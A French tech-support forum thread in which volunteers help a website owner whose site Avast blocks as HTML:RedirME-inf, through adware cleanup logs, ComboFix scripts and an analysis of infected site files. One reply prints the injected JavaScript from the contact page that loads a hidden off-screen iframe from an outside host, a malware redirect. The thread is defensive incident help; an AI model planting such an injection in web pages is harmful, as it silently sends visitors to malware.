HTML :RedirME-inf [Trj] - Site internet bloque par avast [Résolu/Fermé]

Signaler
Messages postés
39
Date d'inscription
lundi 12 janvier 2015
Statut
Membre
Dernière intervention
2 février 2015
-
Messages postés
35446
Date d'inscription
jeudi 18 décembre 2008
Statut
Contributeur sécurité
Dernière intervention
5 mai 2017
-
J'ai un site internet conçu par un professionnel il y a 4 ans. Alors que je n'ai jamais eu de soucis, depuis 3 mois mon antivirus avast (version gratuite) me bloque l'accès à mon site en tant que simple internaute pour la raison de menace suivante :
Objet : c:\Users\....\AppData\...\2551 I {gzip}
infection : HTML :RedirME-inf [Trj]
Action : Bloqué
Processus : C:\Program Files\...\firefox.exe
Mon PC de consultation du site et également mon PC avec lequel je mets à jour ce même site. Pour information, lorsque je me connecte à partir de postes équivalents (PC windows 7) mais équipés soit du logiciel Avira, soit AGV, je n'ai aucun problème.
J'ai réalisé plusieurs nettoyages de mon PC avec CCleaner et Malwarebytes, mais je n'arrive pas à traiter mon problème.
Quelqu'un peut il m'aider?
merci

24 réponses

Messages postés
180267
Date d'inscription
mercredi 17 mai 2006
Statut
Modérateur, Contributeur sécurité
Dernière intervention
15 décembre 2020
23 102
Salut,

Tu as installé des adwares et programmes parasites sur ton PC qui ouvrent des publicités et ralentissent l'ordinateur et les navigateurs WEB.
Voici la procédure à suivre pour les supprimer :

Commence par ceci :

Suis le tutorial AdwCleaner https://www.malekal.com/adwcleaner-supprimer-virus-adwares-pup/?t=33839&start= ( d'Xplode )
Télécharge le sur ton bureau ou dossier de téléchargement.
Lance AdwCleaner, clique sur [Scanner].
L'analyse peux durer plusieurs minutes, patiente.
Une fois le scan terminé, ne décoche rien, clique sur [Nettoyer]

Une fois le nettoyage terminé, un rapport s'ouvrira. Copie/colle le contenu du rapport dans ta prochaine réponse par un copier/coller.
Si cela ne fonctionne pas, utilise le site http://pjjoint.malekal.com pour héberger le rapport, donne le lien du rapport dans un nouveau message.

Note : Le rapport est également sauvegardé sous C:\AdwCleaner[S1].txt


puis :

Suis ce tutoriel FRST: https://www.malekal.com/tutoriel-farbar-recovery-scan-tool-frst/
Cela va générer trois rapports FRST :
* FRST.txt
* Shortcut.txt
* Additionnal.txt

Envoie comme expliqué, ces trois rapports sur le site pjjoint et donne les trois liens pjjoint de ces rapports afin qu'ils puissent être consultés.

1
Merci

Quelques mots de remerciements seront grandement appréciés. Ajouter un commentaire

CCM 63550 internautes nous ont dit merci ce mois-ci

Messages postés
39
Date d'inscription
lundi 12 janvier 2015
Statut
Membre
Dernière intervention
2 février 2015

Merci,
peux tu me confirmer que le fichier suivant que je viens de télécharger "FileOpenerSetup" est celui dont tu parles? car lors de son lancement il ne s'agit ce n'est pas Adwcleaner qui apparait, mais de pcspeedmaximizeer qui me propose de réparer windows ?
peux tu me confirmer pour que je ne m'engage pas dans des problèmes?
merci
Messages postés
180267
Date d'inscription
mercredi 17 mai 2006
Statut
Modérateur, Contributeur sécurité
Dernière intervention
15 décembre 2020
23 102
nan là tu as cliqué sur un pub et tu vas installer d'autres adwares.
Le lien de téléchargement adwcleaner est donné dans le texte du tutorial.
Messages postés
39
Date d'inscription
lundi 12 janvier 2015
Statut
Membre
Dernière intervention
2 février 2015

ok, c'est ce que je pensais,
je suis sur la bonne route à nouveau et entrain de scanner
Messages postés
39
Date d'inscription
lundi 12 janvier 2015
Statut
Membre
Dernière intervention
2 février 2015

voici le rapport de scan de AdwCleaner, quant aux trois autres (Addition+FRST+Shortcut) je t'ai envoyé leur trois liens par mail (dis moi s'il faut que je te mettes ces liens sur le forum directement)?




***** [ Fichiers / Dossiers ] *****

Dossier Supprimé : C:\ProgramData\apn
Dossier Supprimé : C:\ProgramData\Babylon
Dossier Supprimé : C:\ProgramData\Tarma Installer
Dossier Supprimé : C:\ProgramData\Allmyapps
Dossier Supprimé : C:\ProgramData\Microsoft\Windows\Start Menu\Programs\FileOpener
Dossier Supprimé : C:\Program Files\PC Speed Maximizer
Dossier Supprimé : C:\Program Files\predm
Dossier Supprimé : C:\Program Files\RegClean Pro
Dossier Supprimé : C:\Program Files\rightsurf
Dossier Supprimé : C:\Program Files\Systweak Support Dock
Dossier Supprimé : C:\Program Files\Tweaks
Dossier Supprimé : C:\Program Files\WSE_Vosteran
Dossier Supprimé : C:\Program Files\Software
Dossier Supprimé : C:\Users\l-eau\AppData\Local\FileTypeAssistant
Dossier Supprimé : C:\Users\l-eau\AppData\Local\lollipop
Dossier Supprimé : C:\Users\l-eau\AppData\Local\CrashRpt
Dossier Supprimé : C:\Users\l-eau\AppData\Local\Software
Dossier Supprimé : C:\Users\l-eau\AppData\LocalLow\Delta
Dossier Supprimé : C:\Users\l-eau\AppData\Roaming\Babylon
Dossier Supprimé : C:\Users\l-eau\AppData\Roaming\DigitalSites
Dossier Supprimé : C:\Users\l-eau\AppData\Roaming\OfferBox
Dossier Supprimé : C:\Users\l-eau\AppData\Roaming\Systweak
Dossier Supprimé : C:\Users\l-eau\AppData\Roaming\Allmyapps
Dossier Supprimé : C:\Users\l-eau\AppData\Roaming\WSE_Vosteran
Fichier Supprimé : C:\END
Fichier Supprimé : C:\Users\Public\Desktop\FileOpener.lnk
Fichier Supprimé : C:\Windows\system32\roboot.exe
Fichier Supprimé : C:\Users\l-eau\AppData\Roaming\Mozilla\Firefox\Profiles\xnlx9p4t.default-1393440752245\invalidprefs.js
Fichier Supprimé : C:\Users\l-eau\AppData\Roaming\Mozilla\Firefox\Profiles\xnlx9p4t.default-1393440752245\user.js
Fichier Supprimé : C:\Users\l-eau\AppData\Roaming\Mozilla\Firefox\Profiles\xnlx9p4t.default-1393440752245\searchplugins\Vosteran.xml

***** [ Tâches planifiées ] *****

Tâche Supprimée : Digital Sites
Tâche Supprimée : WSE_Vosteran

***** [ Raccourcis ] *****


***** [ Registre ] *****

Clé Supprimée : HKLM\SOFTWARE\Classes\AlxSSB.AlxTBSSB
Clé Supprimée : HKLM\SOFTWARE\Classes\AlxSSB.AlxTBSSB.1
Clé Supprimée : HKLM\SOFTWARE\Classes\AppID\esrv.EXE
Clé Supprimée : HKLM\SOFTWARE\Classes\Prod.cap
Clé Supprimée : HKCU\Software\5e53dd88b138ee47
Clé Supprimée : HKLM\SOFTWARE\Classes\AppID\{1F02FB61-2BE5-4C16-8199-AEAA16EB0342}
Clé Supprimée : HKLM\SOFTWARE\Classes\AppID\{C292AD0A-C11F-479B-B8DB-743E72D283B0}
Clé Supprimée : HKLM\SOFTWARE\Classes\AppID\{9CB2CD61-FFA0-406C-9D2D-8FDE6F4A4D8A}
Clé Supprimée : HKLM\SOFTWARE\Classes\CLSID\{02054E11-5113-4BE3-8153-AA8DFB5D3761}
Clé Supprimée : HKLM\SOFTWARE\Classes\CLSID\{1AA60054-57D9-4F99-9A55-D0FBFBE7ECD3}
Clé Supprimée : HKLM\SOFTWARE\Classes\CLSID\{80922EE0-8A76-46AE-95D5-BD3C3FE0708D}
Clé Supprimée : HKLM\SOFTWARE\Classes\Interface\{021B4049-F57D-4565-A693-FD3B04786BFA}
Clé Supprimée : HKLM\SOFTWARE\Classes\Interface\{0362AA09-808D-48E9-B360-FB51A8CBCE09}
Clé Supprimée : HKLM\SOFTWARE\Classes\Interface\{06844020-CD0B-3D3D-A7FE-371153013E49}
Clé Supprimée : HKLM\SOFTWARE\Classes\Interface\{0ADC01BB-303B-3F8E-93DA-12C140E85460}
Clé Supprimée : HKLM\SOFTWARE\Classes\Interface\{10D3722F-23E6-3901-B6C1-FF6567121920}
Clé Supprimée : HKLM\SOFTWARE\Classes\Interface\{1675E62B-F911-3B7B-A046-EB57261212F3}
Clé Supprimée : HKLM\SOFTWARE\Classes\Interface\{192929F2-9273-3894-91B0-F54671C4C861}
Clé Supprimée : HKLM\SOFTWARE\Classes\Interface\{2932897E-3036-43D9-8A64-B06447992065}
Clé Supprimée : HKLM\SOFTWARE\Classes\Interface\{2DE92D29-A042-3C37-BFF8-07C7D8893EFA}
Clé Supprimée : HKLM\SOFTWARE\Classes\Interface\{32B80AD6-1214-45F4-994E-78A5D482C000}
Clé Supprimée : HKLM\SOFTWARE\Classes\Interface\{3A8E103F-B2B7-3BEF-B3B0-88E29B2420E4}
Clé Supprimée : HKLM\SOFTWARE\Classes\Interface\{431532BD-0AE1-4ABC-BE8C-919F3D1332E2}
Clé Supprimée : HKLM\SOFTWARE\Classes\Interface\{478CE5D3-D38E-3FFE-8DBE-8C4A0F1C4D8D}
Clé Supprimée : HKLM\SOFTWARE\Classes\Interface\{48B7DA4E-69ED-39E3-BAD5-3E3EFF22CFB0}
Clé Supprimée : HKLM\SOFTWARE\Classes\Interface\{5982F405-44E4-3BBB-BAC4-CF8141CBBC5C}
Clé Supprimée : HKLM\SOFTWARE\Classes\Interface\{5D8C3CC3-3C05-38A1-B244-924A23115FE9}
Clé Supprimée : HKLM\SOFTWARE\Classes\Interface\{641593AF-D9FD-30F7-B783-36E16F7A2E08}
Clé Supprimée : HKLM\SOFTWARE\Classes\Interface\{711FC48A-1356-3932-94D8-A8B733DBC7E4}
Clé Supprimée : HKLM\SOFTWARE\Classes\Interface\{72227B7F-1F02-3560-95F5-592E68BACC0C}
Clé Supprimée : HKLM\SOFTWARE\Classes\Interface\{7B5E8CE3-4722-4C0E-A236-A6FF731BEF37}
Clé Supprimée : HKLM\SOFTWARE\Classes\Interface\{890D4F59-5ED0-3CB4-8E0E-74A5A86E7ED0}
Clé Supprimée : HKLM\SOFTWARE\Classes\Interface\{8C68913C-AC3C-4494-8B9C-984D87C85003}
Clé Supprimée : HKLM\SOFTWARE\Classes\Interface\{8D019513-083F-4AA5-933F-7D43A6DA82C4}
Clé Supprimée : HKLM\SOFTWARE\Classes\Interface\{923F6FB8-A390-370E-A0D2-DD505432481D}
Clé Supprimée : HKLM\SOFTWARE\Classes\Interface\{9BBB26EF-B178-35D6-9D3D-B485F4279FE5}
Clé Supprimée : HKLM\SOFTWARE\Classes\Interface\{A62DDBE0-8D2A-339A-B089-8CBCC5CD322A}
Clé Supprimée : HKLM\SOFTWARE\Classes\Interface\{A82AD04D-0B8E-3A49-947B-6A69A8A9C96D}
Clé Supprimée : HKLM\SOFTWARE\Classes\Interface\{ADEB3CC9-A05D-4FCC-BD09-9025456AA3EA}
Clé Supprimée : HKLM\SOFTWARE\Classes\Interface\{B06D4521-D09C-3F41-8E39-9D784CCA2A75}
Clé Supprimée : HKLM\SOFTWARE\Classes\Interface\{C06DAD42-6F39-4CE1-83CC-9A8B9105E556}
Clé Supprimée : HKLM\SOFTWARE\Classes\Interface\{C2E799D0-43A5-3477-8A98-FC5F3677F35C}
Clé Supprimée : HKLM\SOFTWARE\Classes\Interface\{D16107CD-2AD5-46A8-BA59-303B7C32C500}
Clé Supprimée : HKLM\SOFTWARE\Classes\Interface\{D25B101F-8188-3B43-9D85-201F372BC205}
Clé Supprimée : HKLM\SOFTWARE\Classes\Interface\{D2BA7595-5E44-3F1E-880F-03B3139FA5ED}
Clé Supprimée : HKLM\SOFTWARE\Classes\Interface\{D35F5C81-17D9-3E1C-A1FC-4472542E1D25}
Clé Supprimée : HKLM\SOFTWARE\Classes\Interface\{D8FA96CA-B250-312C-AF34-4FF1DD72589D}
Clé Supprimée : HKLM\SOFTWARE\Classes\Interface\{DAFC1E63-3359-416D-9BC2-E7DCA6F7B0F3}
Clé Supprimée : HKLM\SOFTWARE\Classes\Interface\{DC5E5C44-80FD-3697-9E65-9F286D92F3E7}
Clé Supprimée : HKLM\SOFTWARE\Classes\Interface\{E1B4C9DE-D741-385F-981E-6745FACE6F01}
Clé Supprimée : HKLM\SOFTWARE\Classes\Interface\{E7B623F5-9715-3F9F-A671-D1485A39F8A2}
Clé Supprimée : HKLM\SOFTWARE\Classes\Interface\{ED916A7B-7C68-3198-B87D-2DABC30A5587}
Clé Supprimée : HKLM\SOFTWARE\Classes\Interface\{EFA1BDB2-BB3D-3D9A-8EB5-D0D22E0F64F4}
Clé Supprimée : HKLM\SOFTWARE\Classes\Interface\{F4CBF4DD-F8FE-35BA-BB7E-68304DAAB70B}
Clé Supprimée : HKLM\SOFTWARE\Classes\Interface\{FC32005D-E27C-32E0-ADFA-152F598B75E7}
Clé Supprimée : HKLM\SOFTWARE\Classes\TypeLib\{095BFD3C-4602-4FE1-96F1-AEFAFBFD067D}
Clé Supprimée : HKLM\SOFTWARE\Classes\TypeLib\{2BF2028E-3F3C-4C05-AB45-B2F1DCFE0759}
Clé Supprimée : HKLM\SOFTWARE\Classes\TypeLib\{C292AD0A-C11F-479B-B8DB-743E72D283B0}
Clé Supprimée : HKLM\SOFTWARE\Classes\TypeLib\{DA9FC525-41ED-4C00-B046-946DA7CDD305}
Clé Supprimée : HKLM\SOFTWARE\Classes\TypeLib\{DB538320-D3C5-433C-BCA9-C4081A054FCF}
Clé Supprimée : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{A4C2FB10-84C3-44EB-9F9E-860FA1D9A797}
Clé Supprimée : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{DF7770F7-832F-4BDF-B144-100EDDD0C3AE}
Clé Supprimée : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{FBCBC43A-DCA9-4192-A4C8-B57FD0F77D4D}
Clé Supprimée : HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{E57091A7-B5F0-4C42-9329-72ED3E59ED31}
Clé Supprimée : HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{43C65AA8-D8F0-4A19-8BD5-62213448C46A}
Clé Supprimée : HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{9CB96984-43C3-4D44-90EF-01466EFCF7BB}
Clé Supprimée : HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{9CB96984-43C3-4D44-90EF-01466EFCF7BB}
Clé Supprimée : HKCU\Software\Alexa Internet
Clé Supprimée : HKCU\Software\APN PIP
Clé Supprimée : HKCU\Software\BABSOLUTION
Clé Supprimée : HKCU\Software\Bitberry Software
Clé Supprimée : HKCU\Software\Bitberry
Clé Supprimée : HKCU\Software\Boxore
Clé Supprimée : HKCU\Software\Conduit
Clé Supprimée : HKCU\Software\distromatic
Clé Supprimée : HKCU\Software\InstallCore
Clé Supprimée : HKCU\Software\lollipop
Clé Supprimée : HKCU\Software\Offerbox
Clé Supprimée : HKCU\Software\systweak
Clé Supprimée : HKCU\Software\Tutorials
Clé Supprimée : HKCU\Software\YahooPartnerToolbar
Clé Supprimée : HKCU\Software\WSE_Vosteran
Clé Supprimée : HKCU\Software\AppDataLow\{1146AC44-2F03-4431-B4FD-889BC837521F}
Clé Supprimée : HKLM\SOFTWARE\{3A7D3E19-1B79-4E4E-BD96-5467DA2C4EF0}
Clé Supprimée : HKLM\SOFTWARE\{6791A2F3-FC80-475C-A002-C014AF797E9C}
Clé Supprimée : HKLM\SOFTWARE\Babylon
Clé Supprimée : HKLM\SOFTWARE\InstallCore
Clé Supprimée : HKLM\SOFTWARE\Offerbox
Clé Supprimée : HKLM\SOFTWARE\PIP
Clé Supprimée : HKLM\SOFTWARE\systweak
Clé Supprimée : HKLM\SOFTWARE\Tarma Installer
Clé Supprimée : HKLM\SOFTWARE\Tutorials
Clé Supprimée : HKLM\SOFTWARE\Vittalia
Clé Supprimée : HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\File Opener Packages
Clé Supprimée : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SearchTheWebARP
Clé Supprimée : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Tweaks FileOpener
Clé Supprimée : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WSE_Vosteran
Clé Supprimée : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SpyHunter
Clé Supprimée : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\0238BBE24EA3A70408B81E4BB89C15E5
Clé Supprimée : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\29799DE249E7DBC459FC6C8F07EB8375
Clé Supprimée : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\43C098337DB065A49B665D4EA7F16D1C
Clé Supprimée : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\A71991503412AEB42838B02C5ED9F9CD
Clé Supprimée : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\CA0054A5AB3EFFE4CB5660E44A1E7DCC
Clé Supprimée : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\F7652513C62FF63448CFF05163719DB7
Clé Supprimée : HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SoftwareUpdate.exe

***** [ Navigateurs ] *****

-\\ Internet Explorer v0.0.0.0

Paramètre Restauré : HKCU\Software\Microsoft\Internet Explorer\Main [Search Page]

-\\ Mozilla Firefox v34.0.5 (x86 fr)

[xnlx9p4t.default-1393440752245\prefs.js] - Ligne Supprimée : user_pref("browser.search.defaultenginename", "Vosteran");
[xnlx9p4t.default-1393440752245\prefs.js] - Ligne Supprimée : user_pref("browser.search.selectedEngine", "Vosteran");
[xnlx9p4t.default-1393440752245\prefs.js] - Ligne Supprimée : user_pref("browser.startup.homepage", "hxxp://vosteran.com/?f=1&a=vst_ggfc_15_03_ff&cd=2XzuyEtN2Y1L1Qzu0FtDyE0D0AtB0B0B0CtA0ByDyDyEtByCtN0D0Tzu0StCtCtDyBtN1L2XzutAtFyBtFtCtFtBtN1L1CzutCyEtBzytDyD1V1Bt[...]
[xnlx9p4t.default-1393440752245\prefs.js] - Ligne Supprimée : user_pref("extensions.srchvstrn.hmpgUrl", "hxxp://vosteran.com/?f=1&a=vst_ggfc_15_03_ff&cd=2XzuyEtN2Y1L1Qzu0FtDyE0D0AtB0B0B0CtA0ByDyDyEtByCtN0D0Tzu0StCtCtDyBtN1L2XzutAtFyBtFtCtFtBtN1L1CzutCyEtBzytDyD1[...]
[xnlx9p4t.default-1393440752245\prefs.js] - Ligne Supprimée : user_pref("extensions.srchvstrn.newTabUrl", "hxxp://vosteran.com/?f=2&a=vst_ggfc_15_03_ff&cd=2XzuyEtN2Y1L1Qzu0FtDyE0D0AtB0B0B0CtA0ByDyDyEtByCtN0D0Tzu0StCtCtDyBtN1L2XzutAtFyBtFtCtFtBtN1L1CzutCyEtBzytDy[...]
[xnlx9p4t.default-1393440752245\prefs.js] - Ligne Supprimée : user_pref("extensions.srchvstrn.prtnrId", "WSE_Vosteran");
[xnlx9p4t.default-1393440752245\prefs.js] - Ligne Supprimée : user_pref("extensions.srchvstrn.srchPrvdr", "Vosteran");
[xnlx9p4t.default-1393440752245\prefs.js] - Ligne Supprimée : user_pref("extensions.srchvstrn.tlbrSrchUrl", "hxxp://vosteran.com/?f=3&a=vst_ggfc_15_03_ff&cd=2XzuyEtN2Y1L1Qzu0FtDyE0D0AtB0B0B0CtA0ByDyDyEtByCtN0D0Tzu0StCtCtDyBtN1L2XzutAtFyBtFtCtFtBtN1L1CzutCyEtBzyt[...]

*************************

AdwCleaner[R0].txt - [12672 octets] - [12/01/2015 18:42:25]
AdwCleaner[S0].txt - [12658 octets] - [12/01/2015 18:45:40]

########## EOF - C:\AdwCleaner\AdwCleaner[S0].txt - [12719 octets] ##########
Messages postés
180267
Date d'inscription
mercredi 17 mai 2006
Statut
Modérateur, Contributeur sécurité
Dernière intervention
15 décembre 2020
23 102
ok, passe à FRST :)
Messages postés
39
Date d'inscription
lundi 12 janvier 2015
Statut
Membre
Dernière intervention
2 février 2015

bonsoir,
à ta réponse où tu me demandes le fichier FRST, il semble que tu n'es pas eu mon dernier message. je t'es transmis en effet les liens des 3 rapports comme tu le demandes:

FRST : https://pjjoint.malekal.com/files.php?id=20150112_i11i6p11d1011
ADDITION : https://pjjoint.malekal.com/files.php?id=20150112_n5t6d9x12d9
Shortcut: https://pjjoint.malekal.com/files.php?id=20150112_h15q815n14n9

Encore merci de ton aide, que faut il que je fasse maintenant?
Messages postés
180267
Date d'inscription
mercredi 17 mai 2006
Statut
Modérateur, Contributeur sécurité
Dernière intervention
15 décembre 2020
23 102
ca a l'air bon,

Désinstalle Spyhunter, sert à rien.
Messages postés
39
Date d'inscription
lundi 12 janvier 2015
Statut
Membre
Dernière intervention
2 février 2015

SUPER
J'ai 2 petites questions pour finir :
1. Comment désinstaller SpyHunter proprement puisque je ne le trouve pas sur le panneau de configuration ? Il se trouve à l'emplacement suivant : programme > Enigma Software Group > SpyHunter.
2. Toute la procédure que tu m'as indiquée peut elle être appliquée de la même façon sur mon autre portable (qui est installé avec les mêmes logiciels et windows 7) ?
Encore Mille fois merci, cela faisait 3 jours que je cherchais à m'en sortir !!!!
Messages postés
180267
Date d'inscription
mercredi 17 mai 2006
Statut
Modérateur, Contributeur sécurité
Dernière intervention
15 décembre 2020
23 102
Tu peux utiliser la procédure sur un autre ordinateur, si tu as des pubs dessus.

Pour Spyhunter :


Télécharge Combofix sUBs sur ton bureau : http://download.bleepingcomputer.com/sUBs/ComboFix.exe et sauvegarde le sur ton bureau et pas ailleurs!

DESACTIVE LA PROTECTION ANTIVIR DURANT LA PROCEDURE

Crée un nouveau document texte : clic droit de souris sur le bureau > Nouveau > Document Texte, et copie dedans les lignes suivantes :

driver::
SpyHunter 4 Service
esgiguard
EsgScanner
file::
C:\WINDOWS\system32\Drivers\EsgScanner.sys
folder::
C:\Users\Virginie\AppData\Roaming\Enigma Software Group
C:\Program Files\Enigma Software Group
C:\Windows\System32\Tasks\SpyHunter4Startup
file::
C:\WINDOWS\System32\Tasks\SpyHunter4Startup
C:\Users\l-eau\Desktop\SpyHunter.lnk
C:\Users\l-eau\AppData\Roaming\Enigma Software Group
C:\Users\l-eau\Desktop\SpyHunter.lnk




Enregistre ce fichier sous le nom CFScript

[*]Fait un glisser/déposer de ce fichier CFScript sur le fichier ComboFix.exe

[*]Combofix se lance, laisse toi guider..

[*]Patiente le temps du scan. Le bureau va disparaître à plusieurs reprises: c'est normal!
Ne touche à rien tant que le scan n'est pas terminé.
[*]Une fois le scan achevé, un rapport va s'afficher: poste son contenu sur http://pjjoint.malekal.com/ et donne le lien ici dans un nouveau message.


Bonjour,
j'ai eu un petit soucis cette nuit lors de la désinstallation de spyhunter.
j'ai suivi ta procédure après avoir bloqué l'antivirus AVG... pour ensuite faire comme convenu un glisser/déposer du fichier CFScript sur le fichier ComboFix.exe.

je n'ai touché à rien tant que le scan n'était pas terminé mais malheureusement lors de l'exécution, spyhunter s'est lancé automatiquement (à moins qu'il travaillait déjà en silence sans que cela ne puisse se voir).

le pc s'est bloqué, idem pour l'écran, j'ai attendu 45 mn pour suivre ta consigne mais plus rien ne bougeait même en agissant avec le gestionnaire de tache de windows qui ne réagissait pas.
j'ai finalement repris la main en coupant l'alimentation pour tout relancer.

depuis impossible de relancer la procédure avec combofix et spyhunter est toujours en fonction comme avant.
quoi faire à ce stade?
merci de m'éclairer, je suis sans solution.
Messages postés
39
Date d'inscription
lundi 12 janvier 2015
Statut
Membre
Dernière intervention
2 février 2015

salut,
j'ai eu un petit soucis cette nuit lors de la désinstallation de spyhunter.
j'ai suivi ta procédure après avoir bloqué l'antivirus AVG... pour ensuite faire comme convenu un glisser/déposer du fichier CFScript sur le fichier ComboFix.exe.

je n'ai touché à rien tant que le scan n'était pas terminé mais malheureusement lors de l'exécution, spyhunter s'est lancé automatiquement (à moins qu'il travaillait déjà en silence sans que cela ne puisse se voir).

le pc s'est bloqué, idem pour l'écran, j'ai attendu 45 mn pour suivre ta consigne mais plus rien ne bougeait même en agissant avec le gestionnaire de tache de windows qui ne réagissait pas.
j'ai finalement repris la main en coupant l'alimentation pour tout relancer.

depuis impossible de relancer la procédure avec combofix et spyhunter est toujours en fonction comme avant.
quoi faire à ce stade?
merci de m'éclairer, je suis sans solution.
Messages postés
180267
Date d'inscription
mercredi 17 mai 2006
Statut
Modérateur, Contributeur sécurité
Dernière intervention
15 décembre 2020
23 102
Quelqu'un va prendre la relève pour la partie Spyhunter pour le supprimer avec ZHPDiag.
Patiente :)
Messages postés
39
Date d'inscription
lundi 12 janvier 2015
Statut
Membre
Dernière intervention
2 février 2015

merci de ton aide, ton aide à été précieuse pour éradiquer tous ces cookies polluants.
je suis dans la panade pour ce qui de spyhunter (qui sur ce point ne m'a rien apporté)
je suis preneur d'un secours pour la partie notamment pour sa suppression avec ZHPDiag.
merci
Messages postés
180267
Date d'inscription
mercredi 17 mai 2006
Statut
Modérateur, Contributeur sécurité
Dernière intervention
15 décembre 2020
23 102
Tu peux essayer ce programme : https://forum.malekal.com/viewtopic.php?t=48954&start=

Fais réparer et donne le rapport ici.
Messages postés
39
Date d'inscription
lundi 12 janvier 2015
Statut
Membre
Dernière intervention
2 février 2015

Bonsoir Malekal,

je pensais avoir résolu mon problème après avoir éradiqué les virus et malware avec ton aide.
malheureusement des amis mon signalés que mon site était toujours bloqué par avast.

je ne comprends pas d'autant qu'après toute la procédure ci dessous que l'on a conduite ensemble, j'ai filtré les fichiers du site au travers du logiciel avast (logiciel installé sur mon poste) ainsi qu'avec avira et avg installés sur d'autres postes...

je ne comprends plus, ce n'est pas logique qu'avast trouve encore à bloquer le site alors qu'il en a nettoyé l'ensemble des fichiers avant qu'ils soient transférés sur le site.

toujours la même infection : HTML :RedirME-inf [Trj]
Processus : C:\Program Files\...\firefox.exe

ci joint le message d'avast


ci joint la liste des malwares supprimés par avast avant transfert des fichiers sur le site


Quelqu'un peut il m'aider?
merci
Messages postés
35446
Date d'inscription
jeudi 18 décembre 2008
Statut
Contributeur sécurité
Dernière intervention
5 mai 2017
4 765
Salut,

Le meilleur serait à mon avis que tu ouvres fichier par fichier pour les nettoyer manuellement.
Messages postés
39
Date d'inscription
lundi 12 janvier 2015
Statut
Membre
Dernière intervention
2 février 2015
>
Messages postés
35446
Date d'inscription
jeudi 18 décembre 2008
Statut
Contributeur sécurité
Dernière intervention
5 mai 2017

j'ai 997 fichiers...
je suis infoutu de rentrer dans l'écriture des codes de fichiers et donc cela me parait être énorme comme travail? isn't il?
Messages postés
180267
Date d'inscription
mercredi 17 mai 2006
Statut
Modérateur, Contributeur sécurité
Dernière intervention
15 décembre 2020
23 102
Quel est le site en question ?
Tu peux donner un des fichiers modifiés ?
zip le et envoie sur spamhere-@wanadoo.fr
Messages postés
180267
Date d'inscription
mercredi 17 mai 2006
Statut
Modérateur, Contributeur sécurité
Dernière intervention
15 décembre 2020
23 102
bon alors,

Au vu des emplacements, notamment le script dans images, ce sont probablement des pages contenants des scripts malicieux pour rediriger des internautes vers des malwares.

vite fait dans les sauvegardes, il y a aussi ce code malicieux dans la page de contact :



pour le contact - ça donne :
<script>
var _q = document.createElement('iframe'),
_n = 'setAttribute';
_q[_n]('src', 'http://www.localwebgeek.com/wp-feeds.php');
_q.style.position = 'absolute';
_q.style.width = '16px';
_q[_n]('frameborder', navigator.userAgent.indexOf('d0a7a142b755172da72ff74a1ac25199') + 1);
_q.style.left = '-5597px';
document.write('<div id=\'__dradv\'></div>');
document.getElementById('__dradv').appendChild(_q);
</script>


default.php : http://ddecode.com/phpdecoder/?results=99c033d2af4652b6ea2d23092b473492
Cela provoque des redirections.

Pour contact, du code malicieux qui date de 2012 : http://www.htmlforums.com/archive/index.php/t-148431.html
ce qui est très très vieux.

C'est difficile de savoir si les pages sont comme ça depuis longtemps ou si le code a été modifié récemment, ça me paraît bizarre, car vu comment c'est vieux, Avast! aurait surement détecté le malware qui provoque ces modifications.
Peut-être que les sauvegardes sont passées sur un PC infecté à un moment donné et que tu as tout mis en ligne.

A lire : https://forum.malekal.com/viewtopic.php?t=22837&start=

Sinon le site a été piraté à distance.

~~

Dans le doute, tu peux faire un scan NOD32 sur ton PC: https://www.malekal.com/scan-antivirus-ligne-nod32/#NOD32
Enregistre le rapport et donne le ici.
Je doute qu'il trouve grand chose.



Peut-être que tu devrais supprimer et repartir sur une sauvegarde saine si tu en as une.
Sinon faut tout nettoyer à la main.

Like the angel you are, you laugh creating a lightness in my chest,
Your eyes they penetrate me,
(Your answer's always 'maybe')
That's when I got up and left
Messages postés
180267
Date d'inscription
mercredi 17 mai 2006
Statut
Modérateur, Contributeur sécurité
Dernière intervention
15 décembre 2020
23 102
le default.php ça va sur mgt365.com
mais on trouve pas grand chose dessus.
Messages postés
180267
Date d'inscription
mercredi 17 mai 2006
Statut
Modérateur, Contributeur sécurité
Dernière intervention
15 décembre 2020
23 102
default.php a l'air en ligne, c'est mal.
Messages postés
39
Date d'inscription
lundi 12 janvier 2015
Statut
Membre
Dernière intervention
2 février 2015

bravo tu as dû sans doute voir juste, puisque mes premiers problèmes d'infection de site date de 2012, personne n'avait réussi alors à repérer la cause et on se contentait de changer le fichier index... quelques mois plus tard et ça se reproduisait .... mais aujourd'hui le site se bloque carrément.

pour ce qui est des fichiers infectés, je les ai supprimés du site mais je les ai par ailleurs conservés. j'ai cherché à te les envoyer mais je n'y parviens pas, leur envoi est systématiquement bloqué pour cause de virus.

comment puis je te les faire parvenir si cela peut t'aider

en attendant je vais appliquer le scan que tu recommandes.
Messages postés
180267
Date d'inscription
mercredi 17 mai 2006
Statut
Modérateur, Contributeur sécurité
Dernière intervention
15 décembre 2020
23 102
Faut supprimer la ligne base64 de contactpage, c'est ça qui est malicieux.
Messages postés
39
Date d'inscription
lundi 12 janvier 2015
Statut
Membre
Dernière intervention
2 février 2015
>
Messages postés
180267
Date d'inscription
mercredi 17 mai 2006
Statut
Modérateur, Contributeur sécurité
Dernière intervention
15 décembre 2020

